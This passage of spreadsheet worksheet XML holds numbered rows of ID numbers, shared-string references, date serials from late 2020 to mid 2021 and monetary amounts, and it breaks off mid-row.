    <row r="3383" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3383">
        <v>23479</v>
      </c>
      <c r="B3383">
        <v>50</v>
      </c>
      <c r="C3383" t="s">
        <v>2168</v>
      </c>
      <c r="D3383" t="s">
        <v>12675</v>
      </c>
      <c r="E3383">
        <v>12</v>
      </c>
      <c r="F3383" t="s">
        <v>9577</v>
      </c>
      <c r="G3383" s="1">
        <v>44232</v>
      </c>
      <c r="H3383">
        <v>50000</v>
      </c>
      <c r="I3383" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="3384" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3384">
        <v>23480</v>
      </c>
      <c r="B3384">
        <v>50</v>
      </c>
      <c r="C3384" t="s">
        <v>2168</v>
      </c>
      <c r="D3384" t="s">
        <v>12675</v>
      </c>
      <c r="E3384">
        <v>12</v>
      </c>
      <c r="F3384" t="s">
        <v>9435</v>
      </c>
      <c r="G3384" s="1">
        <v>44232</v>
      </c>
      <c r="H3384">
        <v>50000</v>
      </c>
      <c r="I3384" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="3385" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3385">
        <v>23481</v>
      </c>
      <c r="B3385">
        <v>50</v>
      </c>
      <c r="C3385" t="s">
        <v>2168</v>
      </c>
      <c r="D3385" t="s">
        <v>12675</v>
      </c>
      <c r="E3385">
        <v>12</v>
      </c>
      <c r="F3385" t="s">
        <v>9593</v>
      </c>
      <c r="G3385" s="1">
        <v>44232</v>
      </c>
      <c r="H3385">
        <v>50000</v>
      </c>
      <c r="I3385" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="3386" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3386">
        <v>23482</v>
      </c>
      <c r="B3386">
        <v>50</v>
      </c>
      <c r="C3386" t="s">
        <v>2168</v>
      </c>
      <c r="D3386" t="s">
        <v>12675</v>
      </c>
      <c r="E3386">
        <v>12</v>
      </c>
      <c r="F3386" t="s">
        <v>9561</v>
      </c>
      <c r="G3386" s="1">
        <v>44232</v>
      </c>
      <c r="H3386">
        <v>50000</v>
      </c>
      <c r="I3386" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="3387" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3387">
        <v>23483</v>
      </c>
      <c r="B3387">
        <v>50</v>
      </c>
      <c r="C3387" t="s">
        <v>2168</v>
      </c>
      <c r="D3387" t="s">
        <v>12675</v>
      </c>
      <c r="E3387">
        <v>12</v>
      </c>
      <c r="F3387" t="s">
        <v>9595</v>
      </c>
      <c r="G3387" s="1">
        <v>44232</v>
      </c>
      <c r="H3387">
        <v>50000</v>
      </c>
      <c r="I3387" t="s">
        <v>12676</v>
      </c>
    </row>
    <row r="3388" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3388">
        <v>23484</v>
      </c>
      <c r="B3388">
        <v>42</v>
      </c>
      <c r="C3388" t="s">
        <v>2137</v>
      </c>
      <c r="D3388" t="s">
        <v>12677</v>
      </c>
      <c r="E3388">
        <v>12</v>
      </c>
      <c r="F3388" t="s">
        <v>9561</v>
      </c>
      <c r="G3388" s="1">
        <v>44231</v>
      </c>
      <c r="H3388">
        <v>10000</v>
      </c>
      <c r="J3388" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="3389" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3389">
        <v>23487</v>
      </c>
      <c r="B3389">
        <v>5183</v>
      </c>
      <c r="C3389" t="s">
        <v>4285</v>
      </c>
      <c r="D3389" t="s">
        <v>12678</v>
      </c>
      <c r="E3389">
        <v>13</v>
      </c>
      <c r="F3389" t="s">
        <v>12679</v>
      </c>
      <c r="G3389" s="1">
        <v>44222</v>
      </c>
      <c r="H3389">
        <v>20000000</v>
      </c>
      <c r="I3389" t="s">
        <v>9536</v>
      </c>
      <c r="J3389" t="s">
        <v>12342</v>
      </c>
    </row>
    <row r="3390" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3390">
        <v>23488</v>
      </c>
      <c r="B3390">
        <v>5183</v>
      </c>
      <c r="C3390" t="s">
        <v>4285</v>
      </c>
      <c r="D3390" t="s">
        <v>12678</v>
      </c>
      <c r="E3390">
        <v>13</v>
      </c>
      <c r="F3390" t="s">
        <v>2236</v>
      </c>
      <c r="G3390" s="1">
        <v>44222</v>
      </c>
      <c r="H3390">
        <v>10000000</v>
      </c>
      <c r="I3390" t="s">
        <v>9536</v>
      </c>
      <c r="J3390" t="s">
        <v>12342</v>
      </c>
    </row>
    <row r="3391" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3391">
        <v>23492</v>
      </c>
      <c r="B3391">
        <v>5117</v>
      </c>
      <c r="C3391" t="s">
        <v>8121</v>
      </c>
      <c r="D3391" t="s">
        <v>12680</v>
      </c>
      <c r="E3391">
        <v>12</v>
      </c>
      <c r="F3391" t="s">
        <v>12681</v>
      </c>
      <c r="G3391" s="1">
        <v>44176</v>
      </c>
      <c r="H3391">
        <v>40000</v>
      </c>
      <c r="J3391" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="3392" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3392">
        <v>23493</v>
      </c>
      <c r="B3392">
        <v>5117</v>
      </c>
      <c r="C3392" t="s">
        <v>8121</v>
      </c>
      <c r="D3392" t="s">
        <v>12680</v>
      </c>
      <c r="E3392">
        <v>12</v>
      </c>
      <c r="F3392" t="s">
        <v>12682</v>
      </c>
      <c r="G3392" s="1">
        <v>44176</v>
      </c>
      <c r="H3392">
        <v>100000</v>
      </c>
      <c r="J3392" t="s">
        <v>10103</v>
      </c>
    </row>
    <row r="3393" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3393">
        <v>23494</v>
      </c>
      <c r="B3393">
        <v>236</v>
      </c>
      <c r="C3393" t="s">
        <v>1890</v>
      </c>
      <c r="D3393" t="s">
        <v>11158</v>
      </c>
      <c r="E3393">
        <v>16</v>
      </c>
      <c r="F3393" t="s">
        <v>11016</v>
      </c>
      <c r="G3393" s="1">
        <v>44194</v>
      </c>
      <c r="H3393">
        <v>100000</v>
      </c>
      <c r="J3393" t="s">
        <v>11948</v>
      </c>
    </row>
    <row r="3394" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3394">
        <v>23495</v>
      </c>
      <c r="B3394">
        <v>2086</v>
      </c>
      <c r="C3394" t="s">
        <v>6362</v>
      </c>
      <c r="D3394" t="s">
        <v>12683</v>
      </c>
      <c r="E3394">
        <v>19</v>
      </c>
      <c r="F3394" t="s">
        <v>12684</v>
      </c>
      <c r="G3394" s="1">
        <v>44232</v>
      </c>
      <c r="H3394">
        <v>10000</v>
      </c>
      <c r="I3394" t="s">
        <v>12685</v>
      </c>
      <c r="J3394" t="s">
        <v>12686</v>
      </c>
    </row>
    <row r="3395" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3395">
        <v>23496</v>
      </c>
      <c r="B3395">
        <v>2086</v>
      </c>
      <c r="C3395" t="s">
        <v>6362</v>
      </c>
      <c r="D3395" t="s">
        <v>12683</v>
      </c>
      <c r="E3395">
        <v>19</v>
      </c>
      <c r="F3395" t="s">
        <v>12687</v>
      </c>
      <c r="G3395" s="1">
        <v>44232</v>
      </c>
      <c r="H3395">
        <v>15000</v>
      </c>
      <c r="I3395" t="s">
        <v>12685</v>
      </c>
      <c r="J3395" t="s">
        <v>12688</v>
      </c>
    </row>
    <row r="3396" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3396">
        <v>23497</v>
      </c>
      <c r="B3396">
        <v>2086</v>
      </c>
      <c r="C3396" t="s">
        <v>6362</v>
      </c>
      <c r="D3396" t="s">
        <v>12683</v>
      </c>
      <c r="E3396">
        <v>19</v>
      </c>
      <c r="F3396" t="s">
        <v>4686</v>
      </c>
      <c r="G3396" s="1">
        <v>44232</v>
      </c>
      <c r="H3396">
        <v>40000</v>
      </c>
      <c r="I3396" t="s">
        <v>12685</v>
      </c>
      <c r="J3396" t="s">
        <v>12688</v>
      </c>
    </row>
    <row r="3397" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3397">
        <v>23498</v>
      </c>
      <c r="B3397">
        <v>2086</v>
      </c>
      <c r="C3397" t="s">
        <v>6362</v>
      </c>
      <c r="D3397" t="s">
        <v>12683</v>
      </c>
      <c r="E3397">
        <v>19</v>
      </c>
      <c r="F3397" t="s">
        <v>6917</v>
      </c>
      <c r="G3397" s="1">
        <v>44232</v>
      </c>
      <c r="H3397">
        <v>60000</v>
      </c>
      <c r="I3397" t="s">
        <v>12685</v>
      </c>
      <c r="J3397" t="s">
        <v>12688</v>
      </c>
    </row>
    <row r="3398" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3398">
        <v>23499</v>
      </c>
      <c r="B3398">
        <v>1265</v>
      </c>
      <c r="C3398" t="s">
        <v>3607</v>
      </c>
      <c r="D3398" t="s">
        <v>12046</v>
      </c>
      <c r="E3398">
        <v>29</v>
      </c>
      <c r="F3398" t="s">
        <v>9585</v>
      </c>
      <c r="G3398" s="1">
        <v>44347</v>
      </c>
      <c r="H3398">
        <v>52000</v>
      </c>
      <c r="J3398" t="s">
        <v>12689</v>
      </c>
    </row>
    <row r="3399" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3399">
        <v>23500</v>
      </c>
      <c r="B3399">
        <v>1265</v>
      </c>
      <c r="C3399" t="s">
        <v>3607</v>
      </c>
      <c r="D3399" t="s">
        <v>12046</v>
      </c>
      <c r="E3399">
        <v>29</v>
      </c>
      <c r="F3399" t="s">
        <v>9586</v>
      </c>
      <c r="G3399" s="1">
        <v>44347</v>
      </c>
      <c r="H3399">
        <v>52000</v>
      </c>
      <c r="J3399" t="s">
        <v>12690</v>
      </c>
    </row>
    <row r="3400" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3400">
        <v>23507</v>
      </c>
      <c r="B3400">
        <v>285</v>
      </c>
      <c r="C3400" t="s">
        <v>1078</v>
      </c>
      <c r="D3400" t="s">
        <v>9575</v>
      </c>
      <c r="E3400">
        <v>16</v>
      </c>
      <c r="F3400" t="s">
        <v>10089</v>
      </c>
      <c r="G3400" s="1">
        <v>44218</v>
      </c>
      <c r="H3400">
        <v>10000</v>
      </c>
      <c r="J3400" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3401" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3401">
        <v>23508</v>
      </c>
      <c r="B3401">
        <v>285</v>
      </c>
      <c r="C3401" t="s">
        <v>16494</v>
      </c>
      <c r="D3401" t="s">
        <v>16396</v>
      </c>
      <c r="E3401">
        <v>16</v>
      </c>
      <c r="F3401" t="s">
        <v>9925</v>
      </c>
      <c r="G3401" s="1">
        <v>44218</v>
      </c>
      <c r="H3401">
        <v>46609.75</v>
      </c>
      <c r="J3401" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3402" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3402">
        <v>23509</v>
      </c>
      <c r="B3402">
        <v>1447</v>
      </c>
      <c r="C3402" t="s">
        <v>3970</v>
      </c>
      <c r="D3402" t="s">
        <v>12691</v>
      </c>
      <c r="E3402">
        <v>14</v>
      </c>
      <c r="F3402" t="s">
        <v>3972</v>
      </c>
      <c r="G3402" s="1">
        <v>44277</v>
      </c>
      <c r="H3402">
        <v>1379444</v>
      </c>
      <c r="J3402" t="s">
        <v>12692</v>
      </c>
    </row>
    <row r="3403" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3403">
        <v>23510</v>
      </c>
      <c r="B3403">
        <v>285</v>
      </c>
      <c r="C3403" t="s">
        <v>16494</v>
      </c>
      <c r="D3403" t="s">
        <v>16496</v>
      </c>
      <c r="E3403">
        <v>16</v>
      </c>
      <c r="F3403" t="s">
        <v>11878</v>
      </c>
      <c r="G3403" s="1">
        <v>44218</v>
      </c>
      <c r="H3403">
        <v>29754.799999999999</v>
      </c>
      <c r="J3403" t="s">
        <v>9478</v>
      </c>
    </row>
    <row r="3404" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3404">
        <v>23511</v>
      </c>
      <c r="B3404">
        <v>4964</v>
      </c>
      <c r="C3404" t="s">
        <v>8219</v>
      </c>
      <c r="D3404" t="s">
        <v>12693</v>
      </c>
      <c r="E3404">
        <v>27</v>
      </c>
      <c r="F3404" t="s">
        <v>12694</v>
      </c>
      <c r="G3404" s="1">
        <v>44316</v>
      </c>
      <c r="H3404">
        <v>20000</v>
      </c>
      <c r="J3404" t="s">
        <v>12695</v>
      </c>
    </row>
    <row r="3405" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3405">
        <v>23512</v>
      </c>
      <c r="B3405">
        <v>4964</v>
      </c>
      <c r="C3405" t="s">
        <v>8219</v>
      </c>
      <c r="D3405" t="s">
        <v>12693</v>
      </c>
      <c r="E3405">
        <v>27</v>
      </c>
      <c r="F3405" t="s">
        <v>2236</v>
      </c>
      <c r="G3405" s="1">
        <v>44316</v>
      </c>
      <c r="H3405">
        <v>25000</v>
      </c>
      <c r="J3405" t="s">
        <v>12695</v>
      </c>
    </row>
    <row r="3406" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3406">
        <v>23513</v>
      </c>
      <c r="B3406">
        <v>4964</v>
      </c>
      <c r="C3406" t="s">
        <v>8219</v>
      </c>
      <c r="D3406" t="s">
        <v>12693</v>
      </c>
      <c r="E3406">
        <v>27</v>
      </c>
      <c r="F3406" t="s">
        <v>12696</v>
      </c>
      <c r="G3406" s="1">
        <v>44316</v>
      </c>
      <c r="H3406">
        <v>25000</v>
      </c>
      <c r="J3406" t="s">
        <v>12695</v>
      </c>
    </row>
    <row r="3407" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3407">
        <v>23514</v>
      </c>
      <c r="B3407">
        <v>4964</v>
      </c>
      <c r="C3407" t="s">
        <v>8219</v>
      </c>
      <c r="D3407" t="s">
        <v>12693</v>
      </c>
      <c r="E3407">
        <v>27</v>
      </c>
      <c r="F3407" t="s">
        <v>9437</v>
      </c>
      <c r="G3407" s="1">
        <v>44316</v>
      </c>
      <c r="H3407">
        <v>25000</v>
      </c>
      <c r="J3407" t="s">
        <v>12695</v>
      </c>
    </row>
    <row r="3408" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3408">
        <v>23523</v>
      </c>
      <c r="B3408">
        <v>5172</v>
      </c>
      <c r="C3408" t="s">
        <v>8228</v>
      </c>
      <c r="D3408" t="s">
        <v>12697</v>
      </c>
      <c r="E3408">
        <v>14</v>
      </c>
      <c r="F3408" t="s">
        <v>8230</v>
      </c>
      <c r="G3408" s="1">
        <v>44216</v>
      </c>
      <c r="H3408">
        <v>48000</v>
      </c>
      <c r="I3408" t="s">
        <v>9485</v>
      </c>
    </row>
    <row r="3409" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3409">
        <v>23537</v>
      </c>
      <c r="B3409">
        <v>403</v>
      </c>
      <c r="C3409" t="s">
        <v>1923</v>
      </c>
      <c r="D3409" t="s">
        <v>12698</v>
      </c>
      <c r="E3409">
        <v>2</v>
      </c>
      <c r="F3409" t="s">
        <v>5434</v>
      </c>
      <c r="G3409" s="1">
        <v>44203</v>
      </c>
      <c r="H3409">
        <v>200000</v>
      </c>
      <c r="I3409" t="s">
        <v>9603</v>
      </c>
      <c r="J3409" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3410" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3410">
        <v>23538</v>
      </c>
      <c r="B3410">
        <v>403</v>
      </c>
      <c r="C3410" t="s">
        <v>1923</v>
      </c>
      <c r="D3410" t="s">
        <v>12698</v>
      </c>
      <c r="E3410">
        <v>2</v>
      </c>
      <c r="F3410" t="s">
        <v>7211</v>
      </c>
      <c r="G3410" s="1">
        <v>44203</v>
      </c>
      <c r="H3410">
        <v>200000</v>
      </c>
      <c r="I3410" t="s">
        <v>9603</v>
      </c>
      <c r="J3410" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3411" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3411">
        <v>23539</v>
      </c>
      <c r="B3411">
        <v>403</v>
      </c>
      <c r="C3411" t="s">
        <v>1923</v>
      </c>
      <c r="D3411" t="s">
        <v>12698</v>
      </c>
      <c r="E3411">
        <v>2</v>
      </c>
      <c r="F3411" t="s">
        <v>9466</v>
      </c>
      <c r="G3411" s="1">
        <v>44203</v>
      </c>
      <c r="H3411">
        <v>200000</v>
      </c>
      <c r="I3411" t="s">
        <v>9603</v>
      </c>
      <c r="J3411" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3412" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3412">
        <v>23541</v>
      </c>
      <c r="B3412">
        <v>403</v>
      </c>
      <c r="C3412" t="s">
        <v>1923</v>
      </c>
      <c r="D3412" t="s">
        <v>12698</v>
      </c>
      <c r="E3412">
        <v>2</v>
      </c>
      <c r="F3412" t="s">
        <v>9552</v>
      </c>
      <c r="G3412" s="1">
        <v>44203</v>
      </c>
      <c r="H3412">
        <v>200000</v>
      </c>
      <c r="I3412" t="s">
        <v>9603</v>
      </c>
      <c r="J3412" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3413" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3413">
        <v>23542</v>
      </c>
      <c r="B3413">
        <v>403</v>
      </c>
      <c r="C3413" t="s">
        <v>1923</v>
      </c>
      <c r="D3413" t="s">
        <v>12698</v>
      </c>
      <c r="E3413">
        <v>2</v>
      </c>
      <c r="F3413" t="s">
        <v>4508</v>
      </c>
      <c r="G3413" s="1">
        <v>44203</v>
      </c>
      <c r="H3413">
        <v>200000</v>
      </c>
      <c r="I3413" t="s">
        <v>9603</v>
      </c>
      <c r="J3413" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3414" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3414">
        <v>23543</v>
      </c>
      <c r="B3414">
        <v>403</v>
      </c>
      <c r="C3414" t="s">
        <v>1923</v>
      </c>
      <c r="D3414" t="s">
        <v>12698</v>
      </c>
      <c r="E3414">
        <v>2</v>
      </c>
      <c r="F3414" t="s">
        <v>7901</v>
      </c>
      <c r="G3414" s="1">
        <v>44203</v>
      </c>
      <c r="H3414">
        <v>200000</v>
      </c>
      <c r="I3414" t="s">
        <v>9603</v>
      </c>
      <c r="J3414" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3415" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3415">
        <v>23544</v>
      </c>
      <c r="B3415">
        <v>403</v>
      </c>
      <c r="C3415" t="s">
        <v>1923</v>
      </c>
      <c r="D3415" t="s">
        <v>12698</v>
      </c>
      <c r="E3415">
        <v>2</v>
      </c>
      <c r="F3415" t="s">
        <v>1746</v>
      </c>
      <c r="G3415" s="1">
        <v>44203</v>
      </c>
      <c r="H3415">
        <v>200000</v>
      </c>
      <c r="I3415" t="s">
        <v>9603</v>
      </c>
      <c r="J3415" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3416" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3416">
        <v>23545</v>
      </c>
      <c r="B3416">
        <v>403</v>
      </c>
      <c r="C3416" t="s">
        <v>1923</v>
      </c>
      <c r="D3416" t="s">
        <v>12698</v>
      </c>
      <c r="E3416">
        <v>2</v>
      </c>
      <c r="F3416" t="s">
        <v>1030</v>
      </c>
      <c r="G3416" s="1">
        <v>44203</v>
      </c>
      <c r="H3416">
        <v>200000</v>
      </c>
      <c r="I3416" t="s">
        <v>9603</v>
      </c>
      <c r="J3416" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3417" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3417">
        <v>23546</v>
      </c>
      <c r="B3417">
        <v>403</v>
      </c>
      <c r="C3417" t="s">
        <v>1923</v>
      </c>
      <c r="D3417" t="s">
        <v>12698</v>
      </c>
      <c r="E3417">
        <v>2</v>
      </c>
      <c r="F3417" t="s">
        <v>12383</v>
      </c>
      <c r="G3417" s="1">
        <v>44203</v>
      </c>
      <c r="H3417">
        <v>200000</v>
      </c>
      <c r="I3417" t="s">
        <v>9603</v>
      </c>
      <c r="J3417" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3418" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3418">
        <v>23548</v>
      </c>
      <c r="B3418">
        <v>403</v>
      </c>
      <c r="C3418" t="s">
        <v>1923</v>
      </c>
      <c r="D3418" t="s">
        <v>12698</v>
      </c>
      <c r="E3418">
        <v>2</v>
      </c>
      <c r="F3418" t="s">
        <v>9928</v>
      </c>
      <c r="G3418" s="1">
        <v>44203</v>
      </c>
      <c r="H3418">
        <v>200000</v>
      </c>
      <c r="I3418" t="s">
        <v>9603</v>
      </c>
    </row>
    <row r="3419" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3419">
        <v>23549</v>
      </c>
      <c r="B3419">
        <v>403</v>
      </c>
      <c r="C3419" t="s">
        <v>1923</v>
      </c>
      <c r="D3419" t="s">
        <v>12698</v>
      </c>
      <c r="E3419">
        <v>2</v>
      </c>
      <c r="F3419" t="s">
        <v>3814</v>
      </c>
      <c r="G3419" s="1">
        <v>44203</v>
      </c>
      <c r="H3419">
        <v>200000</v>
      </c>
      <c r="I3419" t="s">
        <v>9603</v>
      </c>
      <c r="J3419" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3420" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3420">
        <v>23550</v>
      </c>
      <c r="B3420">
        <v>403</v>
      </c>
      <c r="C3420" t="s">
        <v>1923</v>
      </c>
      <c r="D3420" t="s">
        <v>12698</v>
      </c>
      <c r="E3420">
        <v>2</v>
      </c>
      <c r="F3420" t="s">
        <v>7057</v>
      </c>
      <c r="G3420" s="1">
        <v>44203</v>
      </c>
      <c r="H3420">
        <v>200000</v>
      </c>
      <c r="I3420" t="s">
        <v>9603</v>
      </c>
      <c r="J3420" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3421" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3421">
        <v>23551</v>
      </c>
      <c r="B3421">
        <v>403</v>
      </c>
      <c r="C3421" t="s">
        <v>1923</v>
      </c>
      <c r="D3421" t="s">
        <v>12698</v>
      </c>
      <c r="E3421">
        <v>2</v>
      </c>
      <c r="F3421" t="s">
        <v>764</v>
      </c>
      <c r="G3421" s="1">
        <v>44203</v>
      </c>
      <c r="H3421">
        <v>2000000</v>
      </c>
    </row>
    <row r="3422" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3422">
        <v>23552</v>
      </c>
      <c r="B3422">
        <v>403</v>
      </c>
      <c r="C3422" t="s">
        <v>1923</v>
      </c>
      <c r="D3422" t="s">
        <v>12698</v>
      </c>
      <c r="E3422">
        <v>2</v>
      </c>
      <c r="F3422" t="s">
        <v>547</v>
      </c>
      <c r="G3422" s="1">
        <v>44203</v>
      </c>
      <c r="H3422">
        <v>2000000</v>
      </c>
      <c r="I3422" t="s">
        <v>9603</v>
      </c>
      <c r="J3422" t="s">
        <v>12117</v>
      </c>
    </row>
    <row r="3423" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3423">
        <v>23553</v>
      </c>
      <c r="B3423">
        <v>1554</v>
      </c>
      <c r="C3423" t="s">
        <v>3927</v>
      </c>
      <c r="D3423" t="s">
        <v>12699</v>
      </c>
      <c r="E3423">
        <v>5</v>
      </c>
      <c r="F3423" t="s">
        <v>12700</v>
      </c>
      <c r="G3423" s="1">
        <v>44187</v>
      </c>
      <c r="H3423">
        <v>20000</v>
      </c>
      <c r="I3423" t="s">
        <v>10222</v>
      </c>
      <c r="J3423" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3424" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3424">
        <v>23554</v>
      </c>
      <c r="B3424">
        <v>1554</v>
      </c>
      <c r="C3424" t="s">
        <v>3927</v>
      </c>
      <c r="D3424" t="s">
        <v>12699</v>
      </c>
      <c r="E3424">
        <v>5</v>
      </c>
      <c r="F3424" t="s">
        <v>12701</v>
      </c>
      <c r="G3424" s="1">
        <v>44187</v>
      </c>
      <c r="H3424">
        <v>200000</v>
      </c>
      <c r="I3424" t="s">
        <v>10222</v>
      </c>
      <c r="J3424" t="s">
        <v>9624</v>
      </c>
    </row>
    <row r="3425" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3425">
        <v>23555</v>
      </c>
      <c r="B3425">
        <v>5190</v>
      </c>
      <c r="C3425" t="s">
        <v>8236</v>
      </c>
      <c r="D3425" t="s">
        <v>12702</v>
      </c>
      <c r="E3425">
        <v>27</v>
      </c>
      <c r="F3425" t="s">
        <v>10840</v>
      </c>
      <c r="G3425" s="1">
        <v>44358</v>
      </c>
      <c r="H3425">
        <v>1500000</v>
      </c>
      <c r="I3425" t="s">
        <v>12703</v>
      </c>
      <c r="J3425" t="s">
        <v>10779</v>
      </c>
    </row>
    <row r="3426" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3426">
        <v>23556</v>
      </c>
      <c r="B3426">
        <v>1321</v>
      </c>
      <c r="C3426" t="s">
        <v>3992</v>
      </c>
      <c r="D3426" t="s">
        <v>12704</v>
      </c>
      <c r="E3426">
        <v>12</v>
      </c>
      <c r="F3426" t="s">
        <v>9460</v>
      </c>
      <c r="G3426" s="1">
        <v>44267</v>
      </c>
      <c r="H3426">
        <v>20</v>
      </c>
      <c r="I3426" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3427" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3427">
        <v>23557</v>
      </c>
      <c r="B3427">
        <v>1321</v>
      </c>
      <c r="C3427" t="s">
        <v>3992</v>
      </c>
      <c r="D3427" t="s">
        <v>12704</v>
      </c>
      <c r="E3427">
        <v>12</v>
      </c>
      <c r="F3427" t="s">
        <v>3499</v>
      </c>
      <c r="G3427" s="1">
        <v>44267</v>
      </c>
      <c r="H3427">
        <v>20</v>
      </c>
      <c r="I3427" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3428" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3428">
        <v>23558</v>
      </c>
      <c r="B3428">
        <v>1321</v>
      </c>
      <c r="C3428" t="s">
        <v>3992</v>
      </c>
      <c r="D3428" t="s">
        <v>12704</v>
      </c>
      <c r="E3428">
        <v>12</v>
      </c>
      <c r="F3428" t="s">
        <v>11215</v>
      </c>
      <c r="G3428" s="1">
        <v>44267</v>
      </c>
      <c r="H3428">
        <v>20</v>
      </c>
      <c r="I3428" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3429" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3429">
        <v>23560</v>
      </c>
      <c r="B3429">
        <v>56</v>
      </c>
      <c r="C3429" t="s">
        <v>1070</v>
      </c>
      <c r="D3429" t="s">
        <v>12705</v>
      </c>
      <c r="E3429">
        <v>12</v>
      </c>
      <c r="F3429" t="s">
        <v>12706</v>
      </c>
      <c r="G3429" s="1">
        <v>44250</v>
      </c>
      <c r="H3429">
        <v>100000</v>
      </c>
      <c r="I3429" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3430" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3430">
        <v>23561</v>
      </c>
      <c r="B3430">
        <v>56</v>
      </c>
      <c r="C3430" t="s">
        <v>1070</v>
      </c>
      <c r="D3430" t="s">
        <v>12705</v>
      </c>
      <c r="E3430">
        <v>12</v>
      </c>
      <c r="F3430" t="s">
        <v>12707</v>
      </c>
      <c r="G3430" s="1">
        <v>44250</v>
      </c>
      <c r="H3430">
        <v>50000</v>
      </c>
      <c r="I3430" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3431" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3431">
        <v>23562</v>
      </c>
      <c r="B3431">
        <v>56</v>
      </c>
      <c r="C3431" t="s">
        <v>1070</v>
      </c>
      <c r="D3431" t="s">
        <v>12705</v>
      </c>
      <c r="E3431">
        <v>12</v>
      </c>
      <c r="F3431" t="s">
        <v>9437</v>
      </c>
      <c r="G3431" s="1">
        <v>44250</v>
      </c>
      <c r="H3431">
        <v>50000</v>
      </c>
      <c r="I3431" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3432" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3432">
        <v>23564</v>
      </c>
      <c r="B3432">
        <v>56</v>
      </c>
      <c r="C3432" t="s">
        <v>1070</v>
      </c>
      <c r="D3432" t="s">
        <v>12705</v>
      </c>
      <c r="E3432">
        <v>12</v>
      </c>
      <c r="F3432" t="s">
        <v>2236</v>
      </c>
      <c r="G3432" s="1">
        <v>44250</v>
      </c>
      <c r="H3432">
        <v>50000</v>
      </c>
      <c r="I3432" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3433" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3433">
        <v>23565</v>
      </c>
      <c r="B3433">
        <v>56</v>
      </c>
      <c r="C3433" t="s">
        <v>1070</v>
      </c>
      <c r="D3433" t="s">
        <v>12705</v>
      </c>
      <c r="E3433">
        <v>12</v>
      </c>
      <c r="F3433" t="s">
        <v>609</v>
      </c>
      <c r="G3433" s="1">
        <v>44250</v>
      </c>
      <c r="H3433">
        <v>50000</v>
      </c>
      <c r="I3433" t="s">
        <v>10031</v>
      </c>
    </row>
    <row r="3434" spans="1:10" x14ac:dyDescent="0.2">
      <c r="A3434">
        <v>23566</v>
      </c>
      <c r="B3434">
        <v>2580</v>
      </c>
      <c r="C3434" t="s">
        <v>6376</v>
      </c>
      <c r="D3434" t="s">
        <v>12708</v>
      </c>
      <c r="E3434">
        <v>5</v>
